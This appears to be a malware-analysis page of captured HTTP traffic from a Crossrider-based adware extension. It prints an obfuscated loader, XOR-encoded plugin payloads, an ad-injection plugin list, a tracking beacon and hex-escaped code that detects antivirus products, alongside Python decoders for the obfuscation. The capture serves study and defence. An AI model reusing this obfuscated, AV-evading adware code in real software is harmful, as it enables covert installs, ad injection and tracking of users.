__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};....
GET /plugins/mins/246.js?ver=17&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424173488"
Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT
Cache-Control: max-age=682
Content-Length: 7448
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422149.cds059.fr7.c
var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","50","51","52","53","54","55","56","57","60","installer","getAdditionalInfo","isFunction","utils","isDefined","asw","isArray","length","toLowerCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds","installer_verifier","","string","charCodeAt","replace","match","apply","fromCharCode","Base64","decode","call","parse","JSON","monetization","internal","plugins","un","def","ined","pluginId","getExtendedSubId","function","slice","getSubId","getTime","_","join","na","httpUrl","__RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INSTALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","appInfo","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","getUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__CROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inlineJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[
<<< skipped >>>
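The 246.js plugin above (named "setup" in plugins.json) is the same loader that was served in clear text a few responses earlier (the `var j={ie:"10",ni:"11",...}` / `appAPI.installer.getAdditionalInfo` code), run through a string-array obfuscator: every literal is replaced by an index into `_0x8f59`. The following Python resolver is an added example, not code from the page or from Crossrider; it embeds the captured prefix of 246.js (cut where the capture is cut) and rebuilds readable source by substituting the table entries back in. Regex and naming are the example's own.

```python
import json
import re

# Prefix of the 246.js response captured on this page: the string table plus
# the first statements of setup2, ending where the capture is truncated.
OBFUSCATED_246_JS = (
    'var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","50",'
    '"51","52","53","54","55","56","57","60","installer","getAdditionalInfo",'
    '"isFunction","utils","isDefined","asw","isArray","length","toLowerCase",'
    '"platform","np","ni","browser_name","__BROWSER_NAME__","getIds",'
    '"installer_verifier","","string","charCodeAt","replace","match","apply",'
    '"fromCharCode","Base64","decode","call","parse","JSON","monetization",'
    '"internal","plugins","un","def","ined","pluginId","getExtendedSubId",'
    '"function","slice","getSubId","getTime","_","join","na","httpUrl","__RND__",'
    '"g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INSTALL_TIME__",'
    '"getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry",'
    '"__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","appInfo",'
    '"__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","getUserId",'
    '"__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__CROSSRIDER_CAMP_ID__",'
    '"getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__CROSSRIDER_APP_NAME__","name",'
    '"__CROSSRIDER_SUB_ID__","httpsUrl","inlineJS","waitForBodyReady","undefined",'
    '"addRemoteJS"];'
    'setup2=function(m,k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],'
    'ch:_0x8f59[3],to:_0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],'
    'ff:_0x8f59[8],tf:_0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],'
    'mf:_0x8f59[13],mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],'
    'cm:_0x8f59[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&'
    'appAPI[_0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI['
)

# "var _0xNNNN=[ ... ];" -- the table is a plain JSON array, so json.loads it.
TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*(\[[^\]]*\]);')
IDENT_RE = re.compile(r'^[A-Za-z_$][A-Za-z0-9_$]*$')


def load_string_table(src):
    """Return (table variable name, list of strings, offset of the code after it)."""
    m = TABLE_RE.search(src)
    if m is None:
        raise ValueError("no string table declaration found")
    return m.group(1), json.loads(m.group(2)), m.end()


def resolve_string_table(src):
    """Rewrite every TABLE[n] reference as the string it stands for.

    obj[TABLE[n]] becomes obj.name when the string is a valid identifier
    (otherwise obj["..."]); a bare TABLE[n] becomes the quoted literal.
    """
    name, table, code_start = load_string_table(src)
    ref = re.escape(name) + r'\[(\d+)\]'

    def as_member(m):
        s = table[int(m.group(1))]
        return '.' + s if IDENT_RE.match(s) else '[' + json.dumps(s) + ']'

    def as_literal(m):
        return json.dumps(table[int(m.group(1))])

    code = src[code_start:]                               # drop the table itself
    code = re.sub(r'\[' + ref + r'\]', as_member, code)   # property accesses first
    return re.sub(ref, as_literal, code)                  # then remaining literals


if __name__ == "__main__":
    print(resolve_string_table(OBFUSCATED_246_JS))
```

Run on the captured prefix, the output reads `setup2=function(m,k){var h={ie:"10",ni:"11",...},i=function(){return appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI[`, which is the clear-text loader seen earlier. The same table also names the steps the decoder for the `setup2(...)` payloads uses (`Base64`, `decode`, `charCodeAt`, `fromCharCode`, `JSON`, `parse`).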
GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1456422146"
Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 1681
Content-Type: application/xml; charset=utf-8
X-HW: 1456422146.dop001.fr7.t,1456422146.cds047.fr7.p
<?xml version="1.0" encoding="UTF-8"?>
<CrAppInfo>
 <Ver>151</Ver>
 <ShortName>winservice86</ShortName>
 <Description>winservice</Description>
 <PublisherName>Corporate Inc</PublisherName>
 <HomePageLink>NA</HomePageLink>
 <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>
 <GroupID>0</GroupID>
 <Domain>NA</Domain>
 <RunInIframe>false</RunInIframe>
 <ThanksURL>NA</ThanksURL>
 <EmailSignature>NA</EmailSignature>
 <SettingsURL>NA</SettingsURL>
 <CertifiedInstall>NA</CertifiedInstall>
 <ExposeSites>NA</ExposeSites>
 <RemoteFBApiURL>NA</RemoteFBApiURL>
 <DisableIE>true</DisableIE>
 <DisableFF>true</DisableFF>
 <EnableSearchIE>false</EnableSearchIE>
 <EnableSearchFF>false</EnableSearchFF>
 <AddressbarIE>NA</AddressbarIE>
 <AddressbarFF>NA</AddressbarFF>
 <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
 <AddressbarCR>NA</AddressbarCR>
 <NewTabURL>NA</NewTabURL>
 <NewTabEmbed>NA</NewTabEmbed>
 <OpenSearchURL>NA</OpenSearchURL>
 <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>
 <BackgroundVer>17</BackgroundVer>
 <Manifest>NA</Manifest>
 <ChangePrevious>fa
<<< skipped >>>
GET /stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 HTTP/1.1
Accept: */*
Host: stats.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: DlPZOvBoJzIz/WFxryltbeCWhjeZWYMKP8KB2vlHmB8ORsxqa5/niF5PGR1hgMPzu5Zh9zWShvk=
x-amz-request-id: C02D4ECBCD887647
Date: Thu, 25 Feb 2016 17:42:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:06:38 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /COMODOCodeSigningCA2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.comodoca.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Content-Type: application/x-pkcs7-crl
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d02ba43ed8f4a94da5de304b643a54a3b1456422142; expires=Fri, 24-Feb-17 17:42:22 GMT; path=/; domain=.comodoca.com; HttpOnly
Last-Modified: Wed, 24 Feb 2016 21:13:33 GMT
ETag: W/"56ce1cfd-11987"
X-CCACDN-Mirror-ID: h6edcacrl9
Cache-Control: public, max-age=14400
CF-Cache-Status: HIT
Expires: Thu, 25 Feb 2016 21:42:22 GMT
Server: cloudflare-nginx
CF-RAY: 27a534d5f171273e-FRA
5ba7..0....0.......0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....COMODO CA Limited1!0...U....COMODO Code Signing CA 2..160224211333Z..160228211333Z0....0".........=...[...<...110824203440Z0".....[..x.Ik.M..ud...110825114542Z0!..Y\7.o...p......F..110825134216Z0!..*..d.. .D>Z...bH..110825235944Z0!..v.....U...........110826180316Z0"......a...sj.........110827065611Z0"....g..?R.G.=s.......110829195328Z0!..q.?@..|f..........110829205743Z0!..<..=. :4.....|Sk..110830163519Z0"....3.>&.=.&.QB.z....110830195540Z0".....W...p.~.....0T..110901131432Z0!...c:6`....V ...}...110901131823Z0".........<.....J.....110901152743Z0!..M....A...=...z.Z..110901185932Z0".........b........y..110901212800Z0"....,..p.....;.@.0...110902154630Z0".....8...b8..}.CO....110902175624Z0"....v.<u\...`....^...110902194811Z0!.. gR`..k}.0c....7..110902205032Z0"....#.y...}[.^.=.. ..110905122329Z0"....8l.q.x.....<..K..110905140709Z0!....=...oHF<v..O....110906095658Z0!..(..j.z5..p.....n..110906140412Z0"....=A.w.p...........110907092516Z0!..5....r..R.a..4....110907092609Z0!.........D..).^.'...110907092655Z0!..[....1............110907132010Z0".......3Ee....p-.....110908132554Z0!..A.v...GR..JJ)c.b..110909093345Z0"....b..T..]..........110910043824Z0"....f.......T.V.N{9..110910044920Z0!..,......h.L.T.|.U..110912173144Z0"....-...D,.UM...O.V..110912173717Z0!.. b......f..j.p.^..110913094740Z0!..Jc...RX.lp!.......110913102919Z0!..R..A.z{~.X...B....110913165335Z0!..>......b|...Rw.g..110914090437Z0!
<<< skipped >>>
GET /plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026982"
Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
Cache-Control: max-age=900
Content-Length: 617
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422147.dop015.fr7.t,1456422146.cds062.fr7.pr
/************************************************************************************
  This is your Page Code. The appAPI.ready() code block will be executed on every page load.
  For more information please visit our docs site: hXXp://docs.crossrider.com
*************************************************************************************/

appAPI.ready(function($) {
    // Place your code here (you can also define new functions above this scope)
    // The $ object is the extension's jQuery object
    // alert("My new Crossrider extension works! The current page is: " + document.location.href);
});
GET /plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:27 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026982"
Last-Modified: Tue, 05 Jan 2016 20:49:42 GMT
Cache-Control: max-age=900
Content-Length: 432
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422147.dop015.fr7.t,1456422147.cds009.fr7.pr
/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hXXp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
    // Place your code here (ideal for handling browser button, global timers, etc.)
});
GET /plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1452026983"
Last-Modified: Tue, 05 Jan 2016 20:49:43 GMT
Cache-Control: max-age=900
Content-Length: 15403
Content-Type: text/plain; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds060.fr7.pr
{
"plugins_version": 128,
"plugins_list":
 [
 {"id":4,"url":"hXXp://js.newcloudrack.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newcloudrack.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newcloudrack.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newcloudrack.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.newcloudrack.com/plugins/mins/246.js","ver":17,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":253,"url":"hXXp://js.newcloudrack.com/plugins/mins/253.js","ver":2,"name":"pixel_inject","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"tar
<<< skipped >>>
GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425996283"
Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....
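Each of the small plugin files above and below (390.js, 391.js, 200.js, 288.js, 339.js, 180.js, 253.js) is a single `setup2(<base64 blob>, <10-character key>)` call; `setup2` itself is defined in the obfuscated 246.js. The blob is not encrypted in any meaningful sense: it is base64 of an ASCII hex string, and the bytes behind the hex are XORed with the repeating key, which yields a pretty-printed JSON plugin descriptor of the same shape (`httpUrl`, `httpsUrl`, ..., `pluginId`) as the entries in the clear-text loader. The decoder below is an added example written for this page, not the sample's or Crossrider's own code; the blob/key pair is copied from the 390.js response, and decoding it gives an object whose first key is `httpUrl` and whose last is `"pluginId": 390`.

```python
import base64
import json

# Argument pair copied verbatim from the 390.js response captured on this page.
BLOB_390 = "MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ=="
KEY_390 = "vgaxdkgenq"


def decode_setup2_blob(blob, key):
    """Reverse the setup2 payload encoding.

    base64 -> ASCII hex string -> bytes, then XOR every byte with the key,
    repeated as often as needed. Returns the plaintext (JSON text here).
    """
    hex_text = base64.b64decode(blob).decode("ascii")
    if len(hex_text) % 2:
        raise ValueError("odd-length hex payload: blob is truncated or mangled")
    data = bytes.fromhex(hex_text)
    k = key.encode("ascii")
    plain = bytes(b ^ k[i % len(k)] for i, b in enumerate(data))
    return plain.decode("utf-8")


def parse_setup2_blob(blob, key):
    """Decode and parse as JSON. Returns None when the plaintext is not valid
    JSON (a truncated capture, or a wrong key), so the caller can inspect the
    raw text instead of crashing."""
    text = decode_setup2_blob(blob, key)
    try:
        return json.loads(text)
    except ValueError:
        return None


if __name__ == "__main__":
    print(decode_setup2_blob(BLOB_390, KEY_390))
```

A wrong key does not raise: XOR with the wrong bytes produces garbage that `json.loads` rejects, which is why `parse_setup2_blob` reports None rather than a partial object. The remaining blobs on this page decode the same way with their own second argument.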
GET /plugins/mins/391.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426068985"
Last-Modified: Wed, 11 Mar 2015 10:16:25 GMT
Cache-Control: max-age=900
Content-Length: 795
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds072.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'bihkugxhrq'); }....
GET /plugins/mins/200.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439709638"
Last-Modified: Sun, 16 Aug 2015 07:20:38 GMT
Cache-Control: max-age=900
Content-Length: 887
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'wgclyvjoqm'); }....
GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426880306"
Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT
Cache-Control: max-age=68
Content-Length: 963
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds041.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'emzzteqsmc'); }....
GET /plugins/mins/339.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425914750"
Last-Modified: Mon, 09 Mar 2015 15:25:50 GMT
Cache-Control: max-age=900
Content-Length: 1079
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds054.fr7.c
if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYwZDEwMTkwYTI0MDc1YjUxNDM1MDRiNGU3YTE5', 'dmcykccxwp'); }....
GET /plugins/mins/220.js?ver=46&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1433161463"
Last-Modified: Mon, 01 Jun 2015 12:24:23 GMT
Cache-Control: max-age=900
Content-Length: 40450
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds007.fr7.c
if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\